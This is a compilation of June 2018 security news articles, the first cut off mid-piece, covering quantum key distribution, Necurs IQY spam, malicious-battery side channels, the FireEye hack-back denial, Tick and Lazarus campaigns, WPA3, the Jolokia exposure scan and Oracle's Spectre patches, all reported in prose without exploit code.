The business premise is simple. The budding arrival of quantum computers will make current strong public key encryption immensely weak. Where current computing power would take too long or too many computers to make factoring large numbers feasible, one quantum computer could factor current public key lengths in a matter of minutes. Public key encryption will not provide security against quantum computers.

Quantum computing is not yet viable -- but it is getting closer every month. Within the last fortnight (15 June 2018), Microsoft blogged, "Microsoft is 'all-in' on building a quantum computer and is making advancements 'every day'."

"Quantum computers," explained Julie Love, director of quantum computing at Microsoft, "could solve a set of problems that are completely intractable to humans at this time, and it could do so in 100 seconds." Microsoft is so confident in its progress that it has already released a Quantum Development Kit for developers.

Quantum Xchange's president and CEO John Prisco told SecurityWeek that we cannot wait for the arrival of commercial quantum computing before we make plans to defend data in transit from quantum computing decryption. Sensitive data can be stolen and stored by both cyber criminals and nation states. While current encryption will keep that data safe from malicious eyes, within a relatively few years the encryption will be broken courtesy of qubit computing and become available to the attackers.

"Nation-states and other nefarious agents have been stockpiling encrypted data for years waiting for the arrival of technology to decode it," warns David Monahan, managing research director at Enterprise Management Associates. "Quantum computers capable of breaking existing SSL encryption may only be a few years away. The time to prepare for this eventuality is now. Organizations without a well-articulated quantum risk management plan will fall behind, and lose business to, those that do."

Quantum key distribution is the only provable way to keep encryption secure both now and in the future -- even against the power of quantum computers. It works at the quantum mechanics level, using photons of light to transfer a shared secret between two entities via a fiber connection. The nature of photons means that they cannot be intercepted without disturbing the quantum state. If this were to happen, it would be detected and the communication abandoned. The protection is based on the laws of physics rather than the power of mathematics.

The Quantum Xchange network is simply a very secure communication system using complex quantum laws of physics. It only operates over dark fiber, which is plentiful in the U.S. Network service providers have been laying down more fiber than they currently require for years.

Quantum Xchange adds the distance enhancing Trusted Node technology developed by Battelle -- which it exclusively owns -- to quantum keys generated by QKD devices from ID Quantique -- for which it has an exclusive U.S. licensing agreement. The combination, transmitted across plentiful U.S. dark fiber, allows the QKD range to be extended indefinitely in 100-mile multiples.

Quantum Xchange

"ID Quantique's QKD solutions have been working robustly in the field, securing Swiss elections for over a decade," comments Gregoire Ribordy, CEO and co-founder of ID Quantique. "Other long-term customers include banks, governments and enterprises worldwide. Quantum Xchange's model to provide end-to-end quantum keys on demand in the US will ensure easy accessibility for such customers to the highest levels of data protection, with inbuilt eavesdropping detection and forward security."

Quantum Xchange is launching its QKD system in the U.S. north east, crossing the financial and government powerhouse of the nation from Washington D.C. to Boston. Its great strength, however, is that distance is no longer a problem, and the firm plans to spread the QKD network across the nation.

"Quantum computing is emerging, and the availability of large-scale quantum computers is on the horizon," says Eric Hay, senior systems engineer at Quantum Xchange in a paper (PDF) published in March 2018. "The threat posed by quantum computing however, is here and now. QKD offers the most complete, secure solution that can be implemented today to secure data from the threat of quantum computing. Because the security is based on physics, not complex math, there is no threat from advances in computing, quantum or otherwise, that will break QKD."


Sophos Patches Privilege Escalation Flaws in SafeGuard Products
26.6.2018 securityweek 
Vulnerebility

Researchers discovered several vulnerabilities in Sophos SafeGuard full-disk and file encryption products. The flaws allow an attacker to escalate privileges on a compromised device and execute arbitrary code with SYSTEM permissions.

A total of seven local privilege escalation vulnerabilities have been identified by researchers at Nettitude. The security holes can be exploited via various IOCTL calls using specially crafted input buffers that allow attackers to control the execution path.

Nettitude has published technical details for each of the flaws, along with a video showing how an attacker with access to the targeted device can escalate privileges to SYSTEM.

According to an advisory published on Tuesday by Sophos, the vulnerabilities affect various versions of SafeGuard Enterprise Client, SafeGuard Easy and SafeGuard LAN Crypt for Windows. The bugs have been assigned the CVE identifiers CVE-2018-6851 through CVE-2018-6857.

“Sophos is not aware of any attacks leveraging those vulnerabilities or exploits for them being available,” the security firm wrote in its advisory. “Exploitation of those vulnerabilities requires running malicious code on the target machine and can result in privilege escalation. This vulnerability is not remotely exploitable (i.e. over the network).”

The vulnerabilities were reported to Sophos in January and patches were created in April. Sophos has advised users to install the available patches.


EFF Secures Email Delivery With STARTTLS Everywhere
26.6.2018 securityweek  Safety

The Electronic Frontier Foundation (EFF) this week announced STARTTLS Everywhere, a new project aimed at improving the security of email delivery.

The EFF is already involved in initiatives aimed at encrypting the web, such as the Let’s Encrypt Certificate Authority, and is now determined to advance email encryption in a manner similar to that of browsing.

Designed for mailserver admins, STARTTLS Everywhere provides the software that allows email servers to automatically get a valid certificate from Let’s Encrypt. It also allows admins to configure their email server software to use STARTTLS, and presents the valid certificate to other email servers.

What’s more, STARTTLS Everywhere features a “preload list” of email servers that have promised to support STARTTLS, thus making it easy to detect downgrade attacks.

“The net result: more secure email, and less mass surveillance,” EFF says.

An addition to SMTP, STARTTLS allows email servers to establish encrypted communication channels to one another, thus delivering email messages securely, without exposing data to anyone listening to the network traffic.

Unlike PGP and S/MIME, which deliver end-to-end encryption, STARTTLS only offers hop-to-hop encryption (hops are the computers an email goes through before reaching its destination), which means that mail providers can read emails if no additional protection is in place.

“Thus, STARTTLS is not a replacement for secure end-to-end solutions. Instead, STARTTLS allows email service providers and administrators to provide a baseline measure of security against outside adversaries,” EFF explains.

Courtesy of various efforts over the past years, effective STARTTLS encryption is as high as 89% at the moment, as per Google's Email Transparency Report. Five years ago, it was at only 39%.

However, even if many mailservers enable STARTTLS, most still do not validate certificates, which provides attackers with the possibility to impersonate them and access or spoof messages that are sent over secure connections.

“As a result, the ecosystem is stuck in a sort of chicken-and-egg problem: no one validates certificates because the other party often doesn’t have a valid one, and the long tail of mailservers continue to use invalid certificates because no one is validating them anyway,” EFF notes.

What’s more, even if a server has STARTTLS and uses a valid certificate, there is no guarantee the communication will be encrypted, because the initial data exchange between servers isn’t encrypted and attackers can block the establishing of a secure connection. Thus, both servers would believe the other doesn’t support STARTTLS, which results in a downgrade attack.

Without encryption, emails are delivered over the Simple Mail Transfer Protocol, or SMTP, which doesn’t secure messages, but allows anyone on the network to read their contents. Thus, not only is sniffing one’s emails an easy task, but mass surveillance also becomes possible.

With the new initiative, EFF wants to increase adoption of STARTTLS, to increase the number of mailservers that actually validate certificates, and also to prevent downgrade attacks on email services.

For mailserver admins, a technical deep dive into STARTTLS Everywhere is available.


Recent spam campaigns powered by Necurs uses Internet Query File attachments
26.6.2018 securityaffairs
Spam

Trend Micro experts reported the Necurs botnet has been using Internet Query (IQY) files in recent spam campaigns to bypass security protections.
The Necurs botnet is currently the largest spam botnet, it has been active since at least 2012 and was involved in massive campaigns spreading malware such as the Locky ransomware, the Scarab ransomware, and the Dridex banking Trojan.

Necurs is the world’s largest spam botnet, it is composed of millions of infected computers worldwide.

The Necurs was not active for a long period at the beginning of 2017 and resumed its activity in April when it was observed using a new technique to avoid detection.

In the campaign observed in April, botmaster leveraged .URL files with modified icons to deceive recipients and trick them into believing they are opening a different file type.

Necurs has now adopted a new tactic to avoid detection, operators now leverage text files with a specific format, IQY files that allow users to import data from external sources into Excel documents, and Windows automatically executes them in Excel.

The campaigns using IQY file attachments feature subject and file names containing terms that refer to sales promotions, offers, and discounts.

“The new wave of spam samples has IQY file attachments. The subject and attachment file contains terms that refer to sales promotions, offers, and discounts, likely to disguise it as the type of information opened in Excel.” reads the report published by Trend Micro.

Once executed, the IQY file queries to the URL in its code to fetch data and insert it into an Excel worksheet.

The data contains a script that exploits Excel’s Dynamic Data Exchange (DDE) feature to execute a command line and launch a PowerShell process to execute a remote PowerShell script directory in the memory of the target system.

The script downloads a Trojanized remote access application and the final payload, the FlawedAMMYY backdoor. The backdoor borrows the code of the Ammyy Admin remote access Trojan.

In recent attacks, the script was used to download an image file before the final payload. The image is a disguised malware downloader that fetches an encrypted component file containing the same backdoor routines.

“The PowerShell script enables the download of an executable file, a trojanized remote access application, and its final payload: the backdoor FlawedAMMYY (detected as BKDR_FlawedAMMYY.A). This backdoor appears to have been developed from the leaked source code of the remote administration software called Ammyy Admin.” continues the analysis.

“In a more recent spam wave, the script downloads an image file before the final payload. The downloaded image is a disguised downloader malware (detected as BKDR_FlawedAMMYY.DLOADR) that downloads an encrypted component file (detected as BKDR_FlawedAMMYY.B) containing the same main backdoor routines.”

necurs query files

FlawedAMMYY implements common backdoor features, it allows attackers to manage files, capture the screen, remote control the machine, establish RDP SessionsService and much more.

The extra layer of evasion implemented in Necurs make the botnet even more insidious as explained by the experts.

“Adding this new layer of evasion to Necurs poses new challenges because web queries generally come in the form of plaintext files, which makes the attached IQY file’s URL the only indication of malware activity. In addition, its structure is the same as normal Web Queries. Therefore, a security solution that blocks malicious URLs could be used to defend against this threat,” Trend Micro concludes.

Experts highlighted that users receive two warning messages upon execution of the IQY file attachment, for this reason, it is essential to pay attention to any warning to neutralize the attack.


One more reason to hate your cellphone battery when it sends private data to the bad actors

26.6.2018 securityaffairs Mobil

Security Researchers demonstrated how a “poisoned” cellphone battery in smartphones can be leveraged to “infer characters typed on a touchscreen
We’ve heard about stealing information through blinking hard drive lights and computer speakers but would you believe the battery in your cell phone can also leak potentially sensitive information?

Researchers at Technion Center for Security Science and Technology (CSST), Hebrew University and University of Texas at Austin have published a paper (Power to peep-all: Inference Attacks by Malicious Batteries on Mobile Devices) explaining how “poisoned” batteries in smartphones can be leveraged to “infer characters typed on a touchscreen; to accurately recover browsing history in an open-world setup; and to reliably detect incoming calls, and the photo shots including their lighting conditions.” Going further, the researchers also describe how the Battery Status API can be used to remotely capture the sensitive information.

The “attack” starts by replacing the battery in the target smartphone with a compromised battery. Perhaps by poisoning the supply chain, gaining secretive access to the device, or selling the batteries through aftermarket resellers. The specific method is left as a thought exercise, but for the risk analysis, we assume that the battery has been replaced and is thus exploitable.

cellphone battery 1

Smartphone users will tell you that the battery is the most frustrating component of their devices. To improve this experience, smartphone batteries include technology to report on current charge rates, discharge rates, charging method, etc. With this information, the device can provide feedback to the user and change operating behavior to maximize battery life.

This requires a communications channel between the battery and the smartphone, and this is the channel the researchers leveraged to exfiltrate data. The information is not restricted to only the operating system but, also exposed to the Battery Status API as defined by the W3C organization meaning it can be captured by a malicious website if accessed through a vulnerable browser (Chrome.) So the attack starts with a compromised battery, leverages the Battery Status API to expose the captured data and sends it to a malicious website through a vulnerable browser. Lots of moving pieces to line up, but plausible. So what information can be exposed this way?

cellphone battery 2

The researchers showed an ability to identify the characters typed on the screen, identify incoming phone calls, determine when a picture is taken and identify metadata for that photo. The characters being typed aren’t read directly, but the poisoned battery infers what is typed by measuring the effect on battery parameters.

This has an effect on the accuracy of the information being captured. Determining when a picture is taken or when a call is received is accurate 100% of the time. But identifying what characters are typed is only accurate 36% of the time. If the eavesdropper is able to narrow the potential characters being typed, for example, if it is known the person is typing a website URL or booking tickets on a travel website, accuracy increases to 65%.

When considering all of the potential cyber threats that exist, this definitely counts as a low risk. Replacing a cell phone battery is difficult to do without the owner being aware, and even if you manage to change the battery, the information it gathers is prone to error and capturing the information remotely is a complex endeavor. But the risk is tangible, and if not mitigated, it could grow to become significant. Mozilla and Apple have already removed support for the Battery Status API from their browsers, and the W3C organization has updated the Battery Status API specification.

Currently, Chrome is the only “vulnerable” means of exfiltrating the data through this specific attack. However as we have seen repeatedly, once a novel approach is identified, others will expand and evolve the attack. This will be an interesting one to watch.


FireEye Denies Hacking Back Against Chinese Cyberspies
26.6.2018 securityweek  CyberSpy

In his latest book, New York Times correspondent David Sanger describes how cybersecurity firm Mandiant hacked into the devices of Chinese cyberspies during its investigation into the threat group known as APT1.

Mandiant, now owned by FireEye, published its famous report on APT1 back in 2013 when it was led by CEO Kevin Mandia. The company at the time released information apparently showing that the Chinese military had been conducting sophisticated cyber-espionage operations.

In his book, “The Perfect Weapon: War, Sabotage, and Fear in the Cyber Age,” Sanger describes how he was allowed to watch Mandiant hack into the hackers’ systems. An excerpt of Sanger’s book shared on Twitter by Thomas Rid, a Professor of Strategic Studies at Johns Hopkins University, reads:

“Ever resourceful, Mandia’s staff of former intelligence officers and cyber experts tried a different method of proving their case. They might not be able to track the IP addresses to the Datong Road high-rise itself, but they could actually look inside the room where the hacks originated. As soon as they detected Chinese hackers breaking into the private networks of some of their clients – mostly Fortune 500 companies – Mandia's investigators reached back through the network to activate the cameras on the hackers' own laptops. They could see their keystrokes while actually watching them at their desks.

The hackers, just about all of them male and most in their mid twenties, carried on like a lot of young guys around the world. They showed up at work about eight-thirty a.m. Shanghai time, checked a few sports scores, emailed their girlfriends, and occasionally watched porn. Then, when the clock struck nine, they started methodically breaking into computer systems around the world, banging on the keyboards until a lunch break gave them a moment to go back to the scores, the girlfriends, and the porn.

One day I sat next to some of Mandia's team, watching the Unit 61938 hacking corps at work; it was a remarkable sight. My previous mental image of PLA officers was a bunch of stiff old generals sitting around in uniforms with epaulets, reminiscing about the glory days with Mao. But these guys were wearing leather jackets or just undershirts [...].”

In a statement published on Monday, FireEye admitted that Sanger was given access to the methods used by Mandiant to gather evidence of APT1’s ties to the Chinese military, but claims the reporter’s description “resulted in a serious mischaracterization of our investigative efforts.”FireEye says it does not hack back

“We did not do this, nor have we ever done this,” FireEye said regarding claims that its employees activated the cameras on the hackers’ own laptops. “To state this unequivocally, Mandiant did not employ ‘hack back’ techniques as part of our investigation of APT1, does not ‘hack back’ in our incident response practice, and does not endorse the practice of ‘hacking back.’”

“Hacking back,” the term used to describe a cyberattack victim – or someone hired by the victim – hacking into the systems of the attacker, is a controversial practice and only few cybersecurity firms have admitted doing it.

FireEye claims that what Sanger described as hacking back were actually video recordings of the attackers interacting with their malware command and control (C&C) servers. The firm has published one of the videos it presumably showed the reporter.

“To someone observing this video ‘over the shoulder’ of one of our investigators, it could appear as live system monitoring. Nevertheless, Mandiant did not create these videos through ‘hacking back’ or any hacking activity. All of these videos were made through information obtained via consensual security monitoring on behalf of victim companies that were compromised,” FireEye explained.

While some industry professionals have accepted FireEye’s explanation for obtaining data on the hackers’ personal online activities, Sanger’s claims that he saw APT1 members wearing leather jackets raises a lot of questions. FireEye has not specifically addressed this issue in its statement, but SecurityWeek is trying to obtain some clarifications from the company. In the meantime, experts have provided some more or less plausible explanations on how the reporter may have seen what he believed were the hackers.

Experts discuss FireEye hack back claims

Richard Bejtlich, who worked for Mandiant and then FireEye between 2011 and 2017, including as Chief Security Strategist, has corroborated FireEye’s statement.

‘At no time when I worked for Mandiant or FireEye, or afterwards, was there ever a notion that we would hack into adversary systems,” Bejtlich wrote in a blog post. “During my six year tenure, we were publicly and privately a ‘no hack back’ company. I never heard anyone talk about hack back operations. No one ever intimated we had imagery of APT1 actors taken with their own laptop cameras. No one even said that would be a good idea.”


Mobile Devices Exposed to Spying via Malicious Batteries: Researchers

26.6.2018 securityweek  Virus

A team of researchers has demonstrated that specially crafted batteries installed in a smartphone can allow malicious actors to harvest and exfiltrate sensitive information.

Researchers from Technion, UT Austin and Hebrew University showed that an attacker can use a malicious battery to obtain various types of information from a device by continuously monitoring power traces. Monitoring the GPU and DRAM can work, but the CPU and the touchscreen leak the most information, experts said.

Experiments have shown that attackers can – with various degrees of accuracy – deduce characters typed via the touchscreen, recover browsing history, and detect incoming calls and when a photo has been taken. Exfiltrating the data is also possible, one bit at a time, through the device’s web browser.

Rogue Batteries Can Be Used to Spy on Mobile Devices, Researchers Warn

The level of accuracy for determining keystrokes was 36%, and researchers showed that attackers can even search for passwords. In the case of detecting which website the victim has visited from a list of Alexa Top 100 sites, the researchers achieved an accuracy of 65%. An attacker can – with 100% accuracy – detect when a phone call has been made. Experiments also showed a high accuracy related to the use of the camera. In addition to detecting when a photo has been taken, an attacker can obtain data on the use of the flash and lighting conditions, researchers said in their paper.

The method requires replacing the targeted device’s battery with a malicious one, either through a supply chain, evil maid or other type of attack. Due to this reason, combined with the fact that the exfiltration and data harvesting are slow and not always accurate, it’s unlikely that such attacks will be seen in the wild any time soon.

On the other hand, the attack is interesting, especially since it’s stealthy – it has a small hardware footprint and it does not require the installation of any software on the targeted device –, it has a low cost, and it leverages a component that is often replaced by users. In one attack scenario described by researchers, the attacker sells batteries online, offering low prices or extended warranty to attract potential victims.

As for data exfiltration, researchers used the Battery Status API. This API was removed by Mozilla and Apple from their web browsers after experts showed that it posed some potentially serious privacy risks, but it’s still present in Chrome.

This API exposes three parameters: time to full charge and discharge, battery level, and charging state. Experts showed that the charging state parameter (which has a value of 0 or 1 when the battery is charging or discharging) can be manipulated for data exfiltration via the wireless charging technology.

When a phone is charged wirelessly, the battery charging state parameter changes when an active transmitter is detected by the device. By placing a circuit that mimics the wireless charger inside the battery, an attacker can control the charging state to send out bits of “0” or “1”. The attacker needs to convince the victim to access a specially crafted website that can read this data via the Battery Status API. Since this is a bidirectional communication channel, the malicious battery can be configured to detect when the attacker’s site is visited by the victim.

However, the time it takes to detect the transition between not charging and charging is 3.9 seconds and the transition back to not charging is 1.6 seconds, which results in an exfiltration rate of 0.1-0.5 bits per second.

“The attack may seem like a stretch (requires physical battery replacement – or poisoning hardware at a factory), and at this moment one can imagine multiple simpler methods,” commented Lukasz Olejnik, one of the researchers whose work led to Mozilla and Apple removing support for the Battery Status API a couple of years ago. “Nonetheless it is an important study. Is the sky falling? No. Is the work significant? Yes.”

Last year, Olejnik conducted an analysis of the security and privacy implications associated with the ambient light sensors present in phones, tablets and laptops.


China-linked Hackers Targeting Air-Gapped Systems: Report
26.6.2018 securityweek  Attack

The cyber espionage group known as "Tick" has been targeting a secure USB drive built by a South Korean defense company, likely in an attempt to compromise air-gaped systems, Palo Alto Networks reports.

Also known as Bronze Butler, Tick is believed to be based in China and to have been active for at least a decade, although it was detailed for the first time only in April 2016. The group is mainly targeting Japan and South Korea, but variants of their malware were also observed in attacks on organizations in Russia, Singapore, and China.

To date, the group has been observed employing a variety of custom malware families, including Minzen, Datper, Nioupale (aka Daserf), and HomamDownloader.

The attempt to weaponize a secure USB drive is an attack technique uncommon for the actor, which led security researchers to the conclusion that the assault was likely aiming at air-gapped systems (machines that are not connected to the public Internet).

The malware used in these attacks was designed to target systems running Windows XP or Windows Server 2003, which are older, out-of-support OS versions. Air-gapped systems, Palo Alto says, are commonly used in many countries by government, military, and defense contractors, and other industry verticals.

Although no public reports of the attack were published until now, the malware observed in this incident was likely used many years ago.

“Based on the data collected, we do not believe this malware is part of any active threat campaign,” Palo Alto says.

Although they don’t have a complete picture of the past attack, the researchers believe Tick managed to compromise the secure USB drive model and load a malicious file onto an unknown number of devices, which are supposedly certified as secure by the South Korean ITSCC.

The group also created a malware family dubbed SymonLoader, which is somehow loaded on older Windows systems machines, where it continuously looks for these specific USB drives. When detecting the presence of a targeted secure USB drive, SymonLoader attempts to load the unknown malicious file using APIs that directly access the file system (saves the file to the temp directory and executes it).

Without a compromised USB drive or the unknown malicious file, the security researchers were not able to determine the manner in which the USB drives have been compromised.

“Specifically, we do not know if there has been a successful compromise in the supply-chain making these devices, or if these have been compromised post-manufacturing and distributed using other means such as social engineering,” Palo Alto notes.

The malware loader was observed being installed by a Trojanized version of a legitimate Japanese language GO game, which was first observed on January 21, 2018. Previously, the Trojanized application was seen dropping HomamDownloader, which can install malicious files from a remote command and control (C&C) server.

“Despite the differences from previous samples, we believe this sample is related to the Tick group because the shellcode in the Trojanized Japanese game is exactly the same as that found in the Trojanized Korean programs described earlier. Also, SymonLoader shares code with HomamDownloader,” Palo Alto says.

The analyzed SymonLoader sample was apparently created on September, 26, 2012, when both Windows 7 and Windows Server 2008 were already released at that time. The malware, however, specifically targets only Windows XP and Windows Server 2003, and only searches for USB drives built by a South Korean company that develops information and communication security equipment for military, police, government agencies and public institutions.

“The attacker encrypted the unknown executable file and concealed it at the ending part of the secure USB storage in advance. The hidden data is not accessible through logical file operation APIs, such as ReadFile(). Instead, SymonLoader uses Logical Block Addressing (LBA) and SCSI commands to read the data physically from the particular expected location on the removable drive,” the researchers explain.


North Korean Hackers Exploit HWP Docs in Recent Cyber Heists
26.6.2018 securityweek  BigBrothers

A series of malicious Hangul Word Processor (HWP) documents used in recent attacks on cryptocurrency exchanges have been attributed to the North Korea-linked Lazarus group, AlienVault reports.

The attacks appear to include the recent assault on Bithumb, the largest virtual currency exchange in South Korea, with more than 1 million customers. As part of the incident, hackers managed to steal over $30 million worth of cryptocurrencies.

Lazarus, or BlueNoroff, is a state-sponsored hacking group believed to have launched the $81 million cyber heist from the Bangladesh Bank in 2016 and considered the most serious threat against banks. Earlier this year, the group was observed hitting an online casino in Central America and switching interest to crypto-currency.

Earlier this month, AlienVault revealed that Lazarus has been leveraging a new ActiveX vulnerability in attacks on South Korean targets. Now, the security firm says that the hackers have also been using a series of malicious documents to target members of a recent G20 Financial Meeting.

AlienVault's security researchers analyzed three similar malicious documents that have been already associated with Lazarus. One of these mentions the G20 International Financial Architecture Working Group meeting, seeking coordination of the economic policies between the wealthiest countries.

The HWP files include malicious code that fetches next stage malware (either a 32 or 64 bit version of Manuscrypt, which has been already detailed by other security researchers), a threat communicated by impersonating South Korean forum software. Decoy documents of resumes were also included.

A series of reports within South Korea have already suggested that malicious HWP files were used earlier in May and June to set up the Bithumb heist, and that these documents appear linked to previous attacks by Lazarus.

The investigation of a South Korean security company into the thefts also revealed that fake resumes strikingly similar to those delivering the Lazarus-linked Manuscrypt were sent to cryptocurrency organizations.

“Whilst we can’t be certain this malware is responsible for the thefts from Bithumb, it seems a likely suspect,” AlienVault notes.

Related malicious HWP documents from Lazarus have been reportedly targeting crypto-currency users in South Korea earlier this month.

Furthermore, the researchers noticed cryptocurrency phishing domains registered to the same phone number as a domain (itaddnet[.]com) and delivering some of the malware. This would suggest the attackers are also phishing for credentials, in addition to delivering malware.

“It is unusual to see Lazarus registering domains - normally they prefer to compromise legitimate websites. So this would be an unusual attack if it is indeed run by members of Lazarus,” AlienVault says.

Apparently, it would be entirely possible for Lazarus to have hacked Bithumb earlier this month, considering that the group raided the exchange last year as well, which likely provided them with the necessary knowledge to do it again. Over the past year, the group targeted other crypto-currency exchanges as well.

“It’s clear that the thefts from Lazarus won’t stop anytime soon given the gains available - the (partially successful) attempt to steal $1 billion dollars from the Bank of Bangladesh represents 3% of North Korea’s reported GDP. Thefts from South Korean organizations have the double impact of weakening their closest competitor,” AlienVault said.


EU States to Form 'Rapid Response' Cyber Force: Lithuania
26.6.2018 securityweek Cyber

Nine European Union states are to create rapid response teams to counter cyber attacks within the framework of a new EU defence pact, project leader Lithuania announced on Thursday.

"Nine states have agreed to join. The goal is to create rotational EU cyber rapid response teams," Defence Minister Raimundas Karoblis told AFP.

He said his counterparts from Croatia, Estonia, the Netherlands and Romania will join him on Monday to sign the agreement in Luxembourg while Finland, France, Poland and Spain will join later this year.

Teams formed by pooling experts on a rotational basis will be ready to help national authorities to tackle cyber attacks, with the schedule to be approved next year, Karoblis said.

The minister said he expected the EU to allocate funds for software and other equipment, adding that talks with EU institutions will continue about legal and technical aspects.

The cyber force will be among the first joint projects launched under a landmark EU defence pact signed last year.

The EU's move to establish the Permanent Structured Cooperation on security and defence, known as PESCO, was driven in part by US President Donald Trump's questioning of NATO's relevance and Britain's departure from the bloc.

Lithuania, a lead nation of the cyber defence project, has boosted its cyber capabilities in recent years to tackle what it describes as "hostile cyber activities" from nearby Russia, mostly targeting state institutions and the energy sector.


Necurs Campaign Uses Internet Query File Attachments
26.6.2018 securityweek  BotNet

The Necurs botnet has been using Internet Query (IQY) files in recent waves of spam attacks in an effort to thwart security protections.

Active since at least 2012 and currently considered to be the largest spam botnet, the operation has been famous for powering massive Locky ransomware campaigns in 2016 and 2017. The botnet ended last year with a spike in activity and was sending tens of millions of spam emails daily.

This pas April, the botnet was observed using .URL files with modified icons to trick users into believing they are opening a different file type. The files would leverage the Server Message Block (SMB) protocol to execute a payload from a remote server, thus successfully evading certain spam filters.

Necurs has now switched to a new tactic to avoid detection and increase chances of successful infection. Text files with a specific format, IQY files allow users to import data from external sources into Excel spreadsheets, and Windows automatically executes them in Excel.

The spam emails using IQY file attachments feature subject and file names containing terms that refer to sales promotions, offers, and discounts, Trend Micro reveals in a new report.

Once executed, the IQY file queries to the URL indicated in its code. This results in data being pulled from the targeted URL into an Excel worksheet.

The fetched data, Trend Micro discovered, contains a script that abuses Excel’s Dynamic Data Exchange (DDE) feature to execute a command line and start a PowerShell process. Through this process, a remote PowerShell script is executed filelessly on the targeted system.

The script was designed to download an executable file, a Trojanized remote access application, and its final payload: the FlawedAMMYY backdoor. The malware was supposedly built using the leaked code of the Ammyy Admin remote access Trojan.

As part of more recent attacks, the script would download an image file before the final payload. This image, the security researchers say, is a disguised malware downloader that fetches an encrypted component file containing the same main backdoor routines.

FlawedAMMYY was designed to execute a series of commands from a remote malicious server, including file manager, view screen, remote control, audio chat, RDP SessionsService – Install/Start/Stop/RemoveDisable desktop background, disable desktop composition, disable visual effects, and show tooltip – mouse cursor blinking cause.

“Adding this new layer of evasion to Necurs poses new challenges because web queries generally come in the form of plaintext files, which makes the attached IQY file’s URL the only indication of malware activity. In addition, its structure is the same as normal Web Queries. Therefore, a security solution that blocks malicious URLs could be used to defend against this threat,” Trend Micro notes.

To stay protected against such threats, strict security protocols and best practices are essential. Also, because this is a known attack vector, users receive two warning messages upon execution of the IQY file attachment, paying attention to those warnings can stop the infection.


Wi-Fi Alliance Launches WPA3 Security Standard
26.6.2018 securityweek  Safety

The Wi-Fi Alliance, the non-profit organization whose global network of members maintains Wi-Fi technology, announced late on Monday the launch of the WPA3 security standard.

Unveiled in January, the latest version of the Wi-Fi Protected Access (WPA) protocol brings significant improvements in terms of authentication and data protection.

The Wi-Fi Alliance will continue to maintain and improve WPA2, which is mandatory for Wi-Fi Certified devices, as it will likely take several years until WPA3 is widely adopted. The two versions of the protocol will maintain interoperability through a transitional mode of operation and WPA3 will become mandatory once adoption grows.

Wi-Fi Alliance launches WPA3WPA3 has two modes of operation: Personal and Enterprise. WPA3-Personal’s key features include enhanced protection against offline dictionary attacks and password guessing attempts, improved security even if users choose less complex passwords, and the use of forward secrecy in order to protect communications even if a password has been compromised.

WPA3-Enterprise provides 192-bit encryption for networks that require extra security (e.g. the networks of government and financial organizations), improved network resiliency, and greater consistency when it comes to the deployment of cryptographic tools.

Both the Personal and Enterprise modes prohibit the use of legacy protocols, and they require Protected Management Frames (PMF), which provides protection against eavesdropping and forging. PMF is also available for WPA2.

“WPA3 takes the lead in providing the industry’s strongest protections in the ever-changing security landscape,” said Edgar Figueroa, president and CEO of the Wi-Fi Alliance. “WPA3 continues the evolution of Wi-Fi security and maintains the brand promise of Wi-Fi Protected Access.”

The Wi-Fi Alliance also announced the introduction of Easy Connect, a system that makes it easier for users to connect smart home and other Internet of Things (IoT) devices to their wireless networks. Wi-Fi Easy Connect simplifies the process by allowing users to add devices by scanning a QR code with a smartphone or tablet.

Earlier this month, the Wi-Fi Alliance also announced the launch of Wi-Fi Enhanced Open, a certification program that provides protection for unauthenticated networks, such as the ones commonly found in coffee shops, hotels and airports.

The system is designed to protect connections against passive eavesdropping without requiring a password by using Opportunistic Wireless Encryption (OWE) to provide each user unique individual encryption that secures traffic between their device and the Wi-Fi network.


Misconfigured Java web server component Jolokia expose website at cyber attacks
26.6.2018 securityaffairs Hacking

Several websites using the misconfigured Java web server component Jolokia, including those operated by financial organizations. are exposed to cyber attacks.
Websites using a misconfigured Java web server component are exposed to cyber attacks. Several high-profile websites including those operated by financial organizations were affected by issues.

The security researcher Mat Mannion discovered some flaws in Jolokia Java Management Extensions (JMX) that could result in denial of service, information disclosure and other potential attacks against Java web servers.

According to Mannion, some distributions of Jolokia, such as the WAR agent, are “insecure by default.”

“Unfortunately, in a lot of cases this doesn’t happen, and the Jolokia agent is simply deployed as
jolokia.war
or similar. If Tomcat then serves requests directly or behind a reverse proxy, this then leaves the Jolokia endpoint visible by a reliable URL. If this isn’t then secured by a firewall (or similar), the /jolokia endpoint can be left open to the whole Internet without authentication.” reads the security advisory published by Mannion.

“Tomcat (and other servlet containers) export an enormous amount of information over JMX and Jolokia allows execution of arbitrary commands against these MBeans, which can lead to sensitive information disclosure or a DoS [denial of service],”

Jolokia flaws

The expert also published a proof-of-concept exploit against an Apache Tomcat 8 servlet container, but he noticed that it could be easily used against any other webserver.

The expert scanned the Internet for misconfigured Jolokia domains and discovered many vulnerable websites, then notified them via HackerOne.

“I wrote a small program to scan the Alexa top 1 million websites and to check for an unsecured /jolokia endpoint. If found, this discloses the servlet container and version.” wrote the expert.

“For each domain, the following URLs were attempted:

http://$DOMAIN$/jolokia
http://www.$DOMAIN$/jolokia
http://$DOMAIN$:8080/jolokia
https://$DOMAIN$/jolokia
https://www.$DOMAIN$/jolokia
https://$DOMAIN$:8443/jolokia"
Out of the 1,000,000 domains, the results were:

RESULT NO. OF DOMAINS
Exploitable 147
401 2016
Other 2xx 340488
Other 4xx 205645
Timeout/error 451704
The 401 response indicates that connections to Jolokia were secured through some kind of authentication.

Fortunately, many websites addressed the issue before the expert made public its discovery.

Mannion also notified a maintainer on the Jolokia and Apache security team, below the timeline of the issue.

DATE EVENT
24th May 2018 Initial discovery, start scan
25th May 2018 Disclosure to HackerOne
26th-28th May 2018 Disclosure to affected domains, maintainer of Jolokia and Apache security team
25th June 2018 Public disclosure


Oracle issued security patches for recently discovered Spectre and Meltdown issues
26.6.2018 securityaffairs
Vulnerebility

Last week Oracle started releasing software and microcode updates for products affected by the recently disclosed variants of the Spectre and Meltdown flaws.
In May, tech giants Intel, AMD, ARM, IBM, Microsoft and other tech firms teamed to disclose two new variants of both Meltdown and Spectre issues.

The so-called Variant 4 (CVE-2018-3639) relies on a Speculative Store Bypass (SSB), while the Variant 3a (CVE-2018-3640) is a Rogue System Register.

Both Variant 4 and Variant 3a could be exploited by a local attacker for this reason they have been rated “medium severity”

According to Oracle’s security advisory, Variant 4 affects Oracle Linux versions 6 and 7, and Oracle VM 3.4,

“Systems with microprocessors utilizing speculative execution and speculative execution of memory reads before the addresses of all prior memory writes are known may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis, aka Speculative Store Bypass (SSB), Variant 4.” reads the security advisory published by Oracle.

